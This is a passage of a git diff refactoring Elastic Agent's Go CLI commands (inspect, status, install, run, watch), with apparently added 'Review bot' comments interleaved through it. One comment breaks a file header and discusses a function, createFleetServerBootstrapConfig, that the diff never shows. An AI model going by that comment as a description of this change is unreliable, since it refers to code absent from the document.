96% rename from x-pack/elastic-agent/pkg/agent/application/enroll_cmd_test.go rename to x-pack/elastic-agent/pkg/agent/cmd/enroll_cmd_test.go index fe6786276d2..8f5b7c4f8a5 100644 --- a/x-pack/elastic-agent/pkg/agent/application/enroll_cmd_test.go 
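Review bot: `createFleetServerBootstrapConfig` builds a TLS config when either value is set (`if cert != "" || key != ""`), so a certificate without its key, or a key without its certificate, is written into the bootstrap config unless `cfg.Valid()` rejects it, which this hunk does not show. Reject the half-configured pair before building the config: `if (cert == "") != (key == "") { return nil, errors.New("fleet-server certificate and key must be provided together", errors.TypeConfig) }`. Both new functions also lack doc comments; for this one it is worth stating that an empty `host` and a zero `port` fall back to `defaultFleetServerHost` and `defaultFleetServerPort`.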
+++ b/x-pack/elastic-agent/pkg/agent/cmd/enroll_cmd_test.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package cmd import ( "bytes" @@ -45,7 +45,7 @@ func (m *mockStore) Save(in io.Reader) error { } func TestEnroll(t *testing.T) { - log, _ := logger.New("tst") + log, _ := logger.New("tst", false) t.Run("fail to save is propagated", withTLSServer( func(t *testing.T) *http.ServeMux { @@ -81,9 +81,9 @@ func TestEnroll(t *testing.T) { url := "https://" + host store := &mockStore{Err: errors.New("fail to save")} - cmd, err := NewEnrollCmdWithStore( + cmd, err := newEnrollCmdWithStore( log, - &EnrollCmdOption{ + &enrollCmdOption{ ID: "my-id", URL: url, CAs: []string{caFile}, @@ -134,9 +134,9 @@ func TestEnroll(t *testing.T) { url := "https://" + host store := &mockStore{} - cmd, err := NewEnrollCmdWithStore( + cmd, err := newEnrollCmdWithStore( log, - &EnrollCmdOption{ + &enrollCmdOption{ ID: "my-id", URL: url, CAs: []string{caFile}, @@ -191,9 +191,9 @@ func TestEnroll(t *testing.T) { }, func(t *testing.T, host string) { url := "http://" + host + "/" store := &mockStore{} - cmd, err := NewEnrollCmdWithStore( + cmd, err := newEnrollCmdWithStore( log, - &EnrollCmdOption{ + &enrollCmdOption{ ID: "my-id", URL: url, CAs: []string{}, @@ -251,9 +251,9 @@ func TestEnroll(t *testing.T) { }, func(t *testing.T, host string) { url := "http://" + host store := &mockStore{} - cmd, err := NewEnrollCmdWithStore( + cmd, err := newEnrollCmdWithStore( log, - &EnrollCmdOption{ + &enrollCmdOption{ ID: "my-id", URL: url, CAs: []string{}, @@ -296,9 +296,9 @@ func TestEnroll(t *testing.T) { }, func(t *testing.T, host string) { url := "http://" + host store := &mockStore{} - cmd, err := NewEnrollCmdWithStore( + cmd, err := newEnrollCmdWithStore( log, - &EnrollCmdOption{ + &enrollCmdOption{ ID: "my-id", URL: url, CAs: []string{}, 
diff --git a/x-pack/elastic-agent/pkg/agent/cmd/include.go b/x-pack/elastic-agent/pkg/agent/cmd/include.go index b955c85418f..5bc763c6df0 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/include.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/include.go @@ -11,6 +11,7 @@ import ( _ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable/providers/env" _ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable/providers/host" _ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable/providers/kubernetes" + _ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets" _ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable/providers/local" _ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable/providers/localdynamic" _ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable/providers/path" diff --git a/x-pack/elastic-agent/pkg/agent/cmd/inspect.go b/x-pack/elastic-agent/pkg/agent/cmd/inspect.go index bf6d3009f10..e66a15dfe3f 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/inspect.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/inspect.go 
@@ -5,60 +5,74 @@ package cmd import ( + "context" "fmt" "os" "github.com/spf13/cobra" + "gopkg.in/yaml.v2" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application" + "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/filters" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config/operations" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/monitoring/noop" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" + "github.com/elastic/go-sysinfo" ) -func newInspectCommandWithArgs(flags *globalFlags, s []string, streams *cli.IOStreams) *cobra.Command { +func newInspectCommandWithArgs(s []string, streams *cli.IOStreams) *cobra.Command { cmd := &cobra.Command{ Use: "inspect", Short: "Shows configuration of the agent", Long: "Shows current configuration of the agent", Args: cobra.ExactArgs(0), Run: func(c 
*cobra.Command, args []string) { - command, err := application.NewInspectConfigCmd(flags.Config()) - if err != nil { - fmt.Fprintf(streams.Err, "%v\n", err) - os.Exit(1) - } - - if err := command.Execute(); err != nil { + if err := inspectConfig(paths.ConfigFile()); err != nil { fmt.Fprintf(streams.Err, "%v\n", err) os.Exit(1) } }, } - cmd.AddCommand(newInspectOutputCommandWithArgs(flags, s, streams)) + cmd.AddCommand(newInspectOutputCommandWithArgs(s, streams)) return cmd } -func newInspectOutputCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { +func newInspectOutputCommandWithArgs(_ []string, streams *cli.IOStreams) *cobra.Command { cmd := &cobra.Command{ Use: "output", Short: "Displays configuration generated for output", Long: "Displays configuration generated for output.\nIf no output is specified list of output is displayed", Args: cobra.MaximumNArgs(2), - Run: func(c *cobra.Command, args []string) { + RunE: func(c *cobra.Command, args []string) error { outName, _ := c.Flags().GetString("output") program, _ := c.Flags().GetString("program") - - command, err := application.NewInspectOutputCmd(flags.Config(), outName, program) + cfgPath := paths.ConfigFile() + agentInfo, err := info.NewAgentInfo() if err != nil { - fmt.Fprintf(streams.Err, "%v\n", err) - os.Exit(1) + return err } - if err := command.Execute(); err != nil { - fmt.Fprintf(streams.Err, "%v\n", err) - os.Exit(1) + if outName == "" { + return inspectOutputs(cfgPath, agentInfo) } + + return inspectOutput(cfgPath, outName, program, agentInfo) }, } 
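Review bot: `newInspectOutputCommandWithArgs` now reports failures through `RunE`, while `inspect` in the same hunk still writes to `streams.Err` and calls `os.Exit(1)`, so the two subcommands surface errors in different ways. With `RunE` the message and exit code depend on how the root command treats the returned error, which is not visible here; either keep the `Run` plus `os.Exit(1)` pattern or move `inspect` to `RunE` as well. The errors from `GetString("output")` and `GetString("program")` are also dropped with `_`. If both flags are always registered on this command (the registration is outside the hunk), say so with `// output and program are registered on this command, so GetString cannot fail`; otherwise return the error.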
@@ -67,3 +81,260 @@ func newInspectOutputCommandWithArgs(flags *globalFlags, _ []string, streams *cl return cmd } + +func inspectConfig(cfgPath string) error { + fullCfg, err := operations.LoadFullAgentConfig(cfgPath, true) + if err != nil { + return err + } + + return printConfig(fullCfg) +} + +func printMapStringConfig(mapStr map[string]interface{}) error { + l, err := newErrorLogger() + if err != nil { + return err + } + caps, err := capabilities.Load(paths.AgentCapabilitiesPath(), l, status.NewController(l)) + if err != nil { + return err + } + + newCfg, err := caps.Apply(mapStr) + if err != nil { + return errors.New(err, "failed to apply capabilities") + } + newMap, ok := newCfg.(map[string]interface{}) + if !ok { + return errors.New("config returned from capabilities has invalid type") + } + + data, err := yaml.Marshal(newMap) + if err != nil { + return errors.New(err, "could not marshal to YAML") + } + + fmt.Println(string(data)) + return nil +} + +func printConfig(cfg *config.Config) error { + mapStr, err := cfg.ToMapStr() + if err != nil { + return err + } + + return printMapStringConfig(mapStr) +} + +func newErrorLogger() (*logger.Logger, error) { + return logger.NewWithLogpLevel("", logp.ErrorLevel, false) +} + +func inspectOutputs(cfgPath string, agentInfo *info.AgentInfo) error { + l, err := newErrorLogger() + if err != nil { + return err + } + + fullCfg, err := operations.LoadFullAgentConfig(cfgPath, true) + if err != nil { + return err + } + + fleetConfig, err := fullCfg.ToMapStr() + if err != nil { + return err + } + + isStandalone, err := isStandalone(fullCfg) + if err != nil { + return err + } + + return listOutputsFromMap(l, agentInfo, fleetConfig, isStandalone) +} + +func listOutputsFromConfig(log *logger.Logger, agentInfo *info.AgentInfo, cfg *config.Config, isStandalone bool) error { + programsGroup, err := getProgramsFromConfig(log, agentInfo, cfg, isStandalone) + if err != nil { + return err + + } + + for k := range programsGroup { + 
fmt.Println(k) + } + + return nil +} + +func listOutputsFromMap(log *logger.Logger, agentInfo *info.AgentInfo, cfg map[string]interface{}, isStandalone bool) error { + c, err := config.NewConfigFrom(cfg) + if err != nil { + return err + } + + return listOutputsFromConfig(log, agentInfo, c, isStandalone) +} + +func inspectOutput(cfgPath, output, program string, agentInfo *info.AgentInfo) error { + l, err := newErrorLogger() + if err != nil { + return err + } + + fullCfg, err := operations.LoadFullAgentConfig(cfgPath, true) + if err != nil { + return err + } + + fleetConfig, err := fullCfg.ToMapStr() + if err != nil { + return err + } + + return printOutputFromMap(l, agentInfo, output, program, fleetConfig, true) +} + +func printOutputFromConfig(log *logger.Logger, agentInfo *info.AgentInfo, output, programName string, cfg *config.Config, isStandalone bool) error { + programsGroup, err := getProgramsFromConfig(log, agentInfo, cfg, isStandalone) + if err != nil { + return err + + } + + for k, programs := range programsGroup { + if k != output { + continue + } + + var programFound bool + for _, p := range programs { + if programName != "" && programName != p.Spec.Cmd { + continue + } + + programFound = true + fmt.Printf("[%s] %s:\n", k, p.Spec.Cmd) + printMapStringConfig(p.Configuration()) + fmt.Println("---") + } + + if !programFound { + return fmt.Errorf("program '%s' is not recognized within output '%s', try running `elastic-agent inspect output` to find available outputs", + programName, + output) + } + + return nil + } + + return fmt.Errorf("output '%s' is not recognized, try running `elastic-agent inspect output` to find available outputs", output) + +} + +func printOutputFromMap(log *logger.Logger, agentInfo *info.AgentInfo, output, programName string, cfg map[string]interface{}, isStandalone bool) error { + c, err := config.NewConfigFrom(cfg) + if err != nil { + return err + } + + return printOutputFromConfig(log, agentInfo, output, programName, c, 
isStandalone) +} + +func getProgramsFromConfig(log *logger.Logger, agentInfo *info.AgentInfo, cfg *config.Config, isStandalone bool) (map[string][]program.Program, error) { + monitor := noop.NewMonitor() + router := &inmemRouter{} + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + composableCtrl, err := composable.New(log, cfg) + if err != nil { + return nil, err + } + composableWaiter := newWaitForCompose(composableCtrl) + configModifiers := &pipeline.ConfigModifiers{ + Decorators: []pipeline.DecoratorFunc{modifiers.InjectMonitoring}, + Filters: []pipeline.FilterFunc{filters.StreamChecker}, + } + + if !isStandalone { + sysInfo, err := sysinfo.Host() + if err != nil { + return nil, errors.New(err, + "fail to get system information", + errors.TypeUnexpected) + } + configModifiers.Filters = append(configModifiers.Filters, modifiers.InjectFleet(cfg, sysInfo.Info(), agentInfo)) + } + + caps, err := capabilities.Load(paths.AgentCapabilitiesPath(), log, status.NewController(log)) + if err != nil { + return nil, err + } + + emit, err := emitter.New( + ctx, + log, + agentInfo, + composableWaiter, + router, + configModifiers, + caps, + monitor, + ) + if err != nil { + return nil, err + } + + if err := emit(cfg); err != nil { + return nil, err + } + composableWaiter.Wait() + return router.programs, nil +} + +type inmemRouter struct { + programs map[string][]program.Program +} + +func (r *inmemRouter) Route(id string, grpProg map[pipeline.RoutingKey][]program.Program) error { + r.programs = grpProg + return nil +} + +func (r *inmemRouter) Shutdown() {} + +type waitForCompose struct { + controller composable.Controller + done chan bool +} + +func newWaitForCompose(wrapped composable.Controller) *waitForCompose { + return &waitForCompose{ + controller: wrapped, + done: make(chan bool), + } +} + +func (w *waitForCompose) Run(ctx context.Context, cb composable.VarsCallback) error { + err := w.controller.Run(ctx, func(vars []*transpiler.Vars) { + cb(vars) 
+ w.done <- true + }) + return err +} + +func (w *waitForCompose) Wait() { + <-w.done +} + +func isStandalone(cfg *config.Config) (bool, error) { + c, err := configuration.NewFromConfig(cfg) + if err != nil { + return false, err + } + + return configuration.IsStandalone(c.Fleet), nil +} diff --git a/x-pack/elastic-agent/pkg/agent/cmd/install.go b/x-pack/elastic-agent/pkg/agent/cmd/install.go index 09a44bc67c4..090f6a9f2fe 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/install.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/install.go @@ -19,7 +19,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" ) -func newInstallCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { +func newInstallCommandWithArgs(_ []string, streams *cli.IOStreams) *cobra.Command { cmd := &cobra.Command{ Use: "install", Short: "Install Elastic Agent permanently on this system", @@ -29,7 +29,7 @@ Unless all the require command-line parameters are provided or -f is used this c would like the Agent to operate. `, Run: func(c *cobra.Command, args []string) { - if err := installCmd(streams, c, flags, args); err != nil { + if err := installCmd(streams, c, args); err != nil { fmt.Fprintf(streams.Err, "Error: %v\n", err) os.Exit(1) } @@ -42,7 +42,7 @@ would like the Agent to operate. return cmd } -func installCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args []string) error { +func installCmd(streams *cli.IOStreams, cmd *cobra.Command, args []string) error { isAdmin, err := install.HasRoot() if err != nil { return fmt.Errorf("unable to perform install command while checking for administrator rights, %v", err) 
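Review bot: In `printOutputFromConfig` the result of `printMapStringConfig(p.Configuration())` is discarded, so a failure to load or apply capabilities, or to marshal the YAML, still prints the `[output] program:` header and `---` and the command reports success. Return it instead: `if err := printMapStringConfig(p.Configuration()); err != nil { return err }`. `inspectOutput` also passes a literal `true` for `isStandalone` where `inspectOutputs` derives it with `isStandalone(fullCfg)`, so on a Fleet-managed agent the `modifiers.InjectFleet` filter is skipped and the printed configuration may differ from the one that actually runs. Separately, `waitForCompose.Run` sends on the unbuffered `done` channel from the callback while `Wait` receives only once, so a second callback invocation would block; this should be checked against how the controller invokes the callback.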
@@ -57,7 +57,7 @@ func installCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, } // check the lock to ensure that elastic-agent is not already running in this directory - locker := filelock.NewAppLocker(paths.Data(), agentLockFileName) + locker := filelock.NewAppLocker(paths.Data(), paths.AgentLockFileName) if err := locker.TryLock(); err != nil { if err == filelock.ErrAppAlreadyRunning { return fmt.Errorf("cannot perform installation as Elastic Agent is already running from this directory") @@ -141,7 +141,7 @@ func installCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, } } } - cfgFile := flags.Config() + cfgFile := paths.ConfigFile() err = install.Install(cfgFile) if err != nil { return err diff --git a/x-pack/elastic-agent/pkg/agent/cmd/reexec.go b/x-pack/elastic-agent/pkg/agent/cmd/reexec.go index 575828212a2..2ac2425b931 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/reexec.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/reexec.go @@ -12,6 +12,6 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" ) -func newReExecWindowsCommand(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { +func newReExecWindowsCommand(_ []string, streams *cli.IOStreams) *cobra.Command { return nil } diff --git a/x-pack/elastic-agent/pkg/agent/cmd/reexec_windows.go b/x-pack/elastic-agent/pkg/agent/cmd/reexec_windows.go index b47678801fc..68c98c0534f 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/reexec_windows.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/reexec_windows.go @@ -20,7 +20,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" ) -func newReExecWindowsCommand(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { +func newReExecWindowsCommand(_ []string, streams *cli.IOStreams) *cobra.Command { cmd := &cobra.Command{ Hidden: true, Use: "reexec_windows ", 
diff --git a/x-pack/elastic-agent/pkg/agent/cmd/run.go b/x-pack/elastic-agent/pkg/agent/cmd/run.go index cfc2a2898b3..e4d5b1c105c 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/run.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/run.go @@ -46,12 +46,14 @@ const ( agentName = "elastic-agent" ) -func newRunCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { +type cfgOverrider func(cfg *configuration.Configuration) + +func newRunCommandWithArgs(_ []string, streams *cli.IOStreams) *cobra.Command { return &cobra.Command{ Use: "run", Short: "Start the elastic-agent.", Run: func(_ *cobra.Command, _ []string) { - if err := run(flags, streams); err != nil { + if err := run(streams, nil); err != nil { fmt.Fprintf(streams.Err, "%v\n", err) os.Exit(1) } @@ -59,12 +61,12 @@ func newRunCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStream } } -func run(flags *globalFlags, streams *cli.IOStreams) error { // Windows: Mark service as stopped. +func run(streams *cli.IOStreams, override cfgOverrider) error { // Windows: Mark service as stopped. // After this is run, the service is considered by the OS to be stopped. // This must be the first deferred cleanup task (last to execute). defer service.NotifyTermination() - locker := filelock.NewAppLocker(paths.Data(), agentLockFileName) + locker := filelock.NewAppLocker(paths.Data(), paths.AgentLockFileName) if err := locker.TryLock(); err != nil { return err } @@ -81,7 +83,7 @@ func run(flags *globalFlags, streams *cli.IOStreams) error { // Windows: Mark se } service.HandleSignals(stopBeat, cancel) - pathConfigFile := flags.Config() + pathConfigFile := paths.ConfigFile() rawConfig, err := config.LoadFile(pathConfigFile) if err != nil { return errors.New(err, 
@@ -102,6 +104,10 @@ func run(flags *globalFlags, streams *cli.IOStreams) error { // Windows: Mark se errors.M(errors.MetaKeyPath, pathConfigFile)) } + if override != nil { + override(cfg) + } + agentInfo, err := info.NewAgentInfoWithLog(defaultLogLevel(cfg)) if err != nil { return errors.New(err, @@ -110,7 +116,7 @@ func run(flags *globalFlags, streams *cli.IOStreams) error { // Windows: Mark se errors.M(errors.MetaKeyPath, pathConfigFile)) } - logger, err := logger.NewFromConfig("", cfg.Settings.LoggingConfig) + logger, err := logger.NewFromConfig("", cfg.Settings.LoggingConfig, true) if err != nil { return err } @@ -329,7 +335,7 @@ func exposeMetricsEndpoint(log *logger.Logger, config *common.Config, ns func(st } else { content = string(bytes) } - fmt.Fprintf(w, content) + fmt.Fprint(w, content) } } diff --git a/x-pack/elastic-agent/pkg/agent/cmd/status.go b/x-pack/elastic-agent/pkg/agent/cmd/status.go new file mode 100644 index 00000000000..d076c91ee41 --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/cmd/status.go 
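Review bot: `cfgOverrider` (declared in the first run.go hunk) and the new `override` parameter of `run` have no doc comment, although `override(cfg)` rewrites the configuration that was just parsed from `pathConfigFile`, before `info.NewAgentInfoWithLog` and `logger.NewFromConfig` read it. A reader cannot tell which fields a caller is expected to change, and nothing in the visible lines checks `cfg` again after the call. I would document the type, for example `// cfgOverrider adjusts the parsed configuration in memory; run applies it right after loading the config file and before the agent info and logger are created.` The body of `run` continues outside these hunks.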
@@ -0,0 +1,122 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package cmd + +import ( + "context" + "encoding/json" + "fmt" + "io" + "os" + "time" + + "gopkg.in/yaml.v2" + + "github.com/spf13/cobra" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control/client" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" +) + +type outputter func(io.Writer, *client.AgentStatus) error + +var outputs = map[string]outputter{ + "human": humanOutput, + "json": jsonOutput, + "yaml": yamlOutput, +} + +func newStatusCommand(_ []string, streams *cli.IOStreams) *cobra.Command { + cmd := &cobra.Command{ + Use: "status", + Short: "Status returns the current status of the running Elastic Agent daemon.", + Long: `Status returns the current status of the running Elastic Agent daemon.`, + Run: func(c *cobra.Command, args []string) { + if err := statusCmd(streams, c, args); err != nil { + fmt.Fprintf(streams.Err, "Error: %v\n", err) + os.Exit(1) + } + }, + } + + cmd.Flags().String("output", "human", "Output the status information in either human, json, or yaml (default: human)") + + return cmd +} + +func statusCmd(streams *cli.IOStreams, cmd *cobra.Command, args []string) error { + output, _ := cmd.Flags().GetString("output") + outputFunc, ok := outputs[output] + if !ok { + return fmt.Errorf("unsupported output: %s", output) + } + + ctx := handleSignal(context.Background()) + innerCtx, cancel := context.WithTimeout(ctx, 30*time.Second) + defer cancel() + + status, err := getDaemonStatus(innerCtx) + if err == context.DeadlineExceeded { + return errors.New("timed out after 30 seconds trying to connect to Elastic Agent daemon") + } else if err == context.Canceled { + return nil + } else if err != nil { + 
return fmt.Errorf("failed to communicate with Elastic Agent daemon: %s", err) + } + + err = outputFunc(streams.Out, status) + if err != nil { + return err + } + // exit 0 only if the Elastic Agent daemon is healthy + if status.Status == client.Healthy { + os.Exit(0) + } else { + os.Exit(1) + } + return nil +} + +func humanOutput(w io.Writer, status *client.AgentStatus) error { + fmt.Fprintf(w, "Status: %s\n", status.Status) + if status.Message == "" { + fmt.Fprint(w, "Message: (no message)\n") + } else { + fmt.Fprintf(w, "Message: %s\n", status.Message) + } + if len(status.Applications) == 0 { + fmt.Fprint(w, "Applications: (none)\n") + } else { + fmt.Fprint(w, "Applications:\n") + for _, app := range status.Applications { + fmt.Fprintf(w, " * %s\t(%s)\n", app.Name, app.Status) + if app.Message == "" { + fmt.Fprint(w, " (no message)\n") + } else { + fmt.Fprintf(w, " %s\n", app.Message) + } + } + } + return nil +} + +func jsonOutput(w io.Writer, status *client.AgentStatus) error { + bytes, err := json.MarshalIndent(status, "", " ") + if err != nil { + return err + } + fmt.Fprintf(w, "%s\n", bytes) + return nil +} + +func yamlOutput(w io.Writer, status *client.AgentStatus) error { + bytes, err := yaml.Marshal(status) + if err != nil { + return err + } + fmt.Fprintf(w, "%s\n", bytes) + return nil +} diff --git a/x-pack/elastic-agent/pkg/agent/cmd/uninstall.go b/x-pack/elastic-agent/pkg/agent/cmd/uninstall.go index f21f157a2d3..b6757ee464c 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/uninstall.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/uninstall.go @@ -17,7 +17,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" ) -func newUninstallCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { +func newUninstallCommandWithArgs(_ []string, streams *cli.IOStreams) *cobra.Command { cmd := &cobra.Command{ Use: "uninstall", Short: "Uninstall permanent Elastic Agent from this system", 
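Review bot: `statusCmd` calls `os.Exit(0)` and `os.Exit(1)` itself after printing, which skips the deferred `cancel()`, leaves the trailing `return nil` unreachable, and means a test cannot call the function without ending the process. Returning the health result and exiting in the `Run` closure of `newStatusCommand`, where the other `os.Exit(1)` already sits, would keep exit-code handling in one place. The comparisons `err == context.DeadlineExceeded` and `err == context.Canceled` match only unwrapped errors. `getDaemonStatus` is not shown, but if it returns a wrapped or RPC-status error, the 30-second timeout would fall through to the generic "failed to communicate" message. An unwrapping check such as the standard library's `errors.Is(err, context.DeadlineExceeded)` would be safer; this file binds the name `errors` to the project's package, so that needs an alias or an equivalent helper.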
@@ -26,7 +26,7 @@ func newUninstallCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IO Unless -f is used this command will ask confirmation before performing removal. `, Run: func(c *cobra.Command, args []string) { - if err := uninstallCmd(streams, c, flags, args); err != nil { + if err := uninstallCmd(streams, c, args); err != nil { fmt.Fprintf(streams.Err, "Error: %v\n", err) os.Exit(1) } @@ -38,7 +38,7 @@ Unless -f is used this command will ask confirmation before performing removal. return cmd } -func uninstallCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args []string) error { +func uninstallCmd(streams *cli.IOStreams, cmd *cobra.Command, args []string) error { isAdmin, err := install.HasRoot() if err != nil { return fmt.Errorf("unable to perform command while checking for administrator rights, %v", err) @@ -78,7 +78,7 @@ func uninstallCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags } } - err = install.Uninstall(flags.Config()) + err = install.Uninstall(paths.ConfigFile()) if err != nil { return err } diff --git a/x-pack/elastic-agent/pkg/agent/cmd/upgrade.go b/x-pack/elastic-agent/pkg/agent/cmd/upgrade.go index 81a5c82b4ab..d3c8dc27e6c 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/upgrade.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/upgrade.go @@ -17,13 +17,13 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" ) -func newUpgradeCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { +func newUpgradeCommandWithArgs(_ []string, streams *cli.IOStreams) *cobra.Command { cmd := &cobra.Command{ Use: "upgrade ", Short: "Upgrade the currently running Elastic Agent to the specified version", Args: cobra.ExactArgs(1), Run: func(c *cobra.Command, args []string) { - if err := upgradeCmd(streams, c, flags, args); err != nil { + if err := upgradeCmd(streams, c, args); err != nil { fmt.Fprintf(streams.Err, "%v\n", err) os.Exit(1) } 
@@ -35,7 +35,7 @@ func newUpgradeCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOSt return cmd } -func upgradeCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args []string) error { +func upgradeCmd(streams *cli.IOStreams, cmd *cobra.Command, args []string) error { fmt.Fprintln(streams.Out, "The upgrade process of Elastic Agent is currently EXPERIMENTAL and should not be used in production") version := args[0] diff --git a/x-pack/elastic-agent/pkg/agent/cmd/watch.go b/x-pack/elastic-agent/pkg/agent/cmd/watch.go index d7707053dc3..c8a51d33413 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/watch.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/watch.go @@ -34,13 +34,13 @@ const ( watcherLockFile = "watcher.lock" ) -func newWatchCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { +func newWatchCommandWithArgs(_ []string, streams *cli.IOStreams) *cobra.Command { cmd := &cobra.Command{ Use: "watch", Short: "Watch watches Elastic Agent for failures and initiates rollback.", Long: `Watch watches Elastic Agent for failures and initiates rollback.`, Run: func(c *cobra.Command, args []string) { - if err := watchCmd(streams, c, flags, args); err != nil { + if err := watchCmd(streams, c, args); err != nil { fmt.Fprintf(streams.Err, "Error: %v\n", err) os.Exit(1) } @@ -50,8 +50,8 @@ func newWatchCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStre return cmd } -func watchCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args []string) error { - log, err := configuredLogger(flags) +func watchCmd(streams *cli.IOStreams, cmd *cobra.Command, args []string) error { + log, err := configuredLogger() if err != nil { return err } 
@@ -81,7 +81,7 @@ func watchCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, ar isWithinGrace, tilGrace := gracePeriod(marker) if !isWithinGrace { - log.Debugf("not within grace [updatedOn %v] %v", marker.UpdatedOn.String(), time.Now().Sub(marker.UpdatedOn).String()) + log.Debugf("not within grace [updatedOn %v] %v", marker.UpdatedOn.String(), time.Since(marker.UpdatedOn).String()) // if it is started outside of upgrade loop // if we're not within grace and marker is still there it might mean // that cleanup was not performed ok, cleanup everything except current version @@ -172,7 +172,7 @@ WATCHLOOP: // gracePeriod returns true if it is within grace period and time until grace period ends. // otherwise it returns false and 0 func gracePeriod(marker *upgrade.UpdateMarker) (bool, time.Duration) { - sinceUpdate := time.Now().Sub(marker.UpdatedOn) + sinceUpdate := time.Since(marker.UpdatedOn) if 0 < sinceUpdate && sinceUpdate < gracePeriodDuration { return true, gracePeriodDuration - sinceUpdate @@ -181,8 +181,8 @@ func gracePeriod(marker *upgrade.UpdateMarker) (bool, time.Duration) { return false, gracePeriodDuration } -func configuredLogger(flags *globalFlags) (*logger.Logger, error) { - pathConfigFile := flags.Config() +func configuredLogger() (*logger.Logger, error) { + pathConfigFile := paths.ConfigFile() rawConfig, err := config.LoadFile(pathConfigFile) if err != nil { return nil, errors.New(err, @@ -201,7 +201,7 @@ func configuredLogger(flags *globalFlags) (*logger.Logger, error) { cfg.Settings.LoggingConfig.Beat = watcherName - logger, err := logger.NewFromConfig("", cfg.Settings.LoggingConfig) + logger, err := logger.NewFromConfig("", cfg.Settings.LoggingConfig, false) if err != nil { return nil, err } diff --git a/x-pack/elastic-agent/pkg/agent/control/addr.go b/x-pack/elastic-agent/pkg/agent/control/addr.go index 116f9d8dd95..fabaf483140 100644 --- 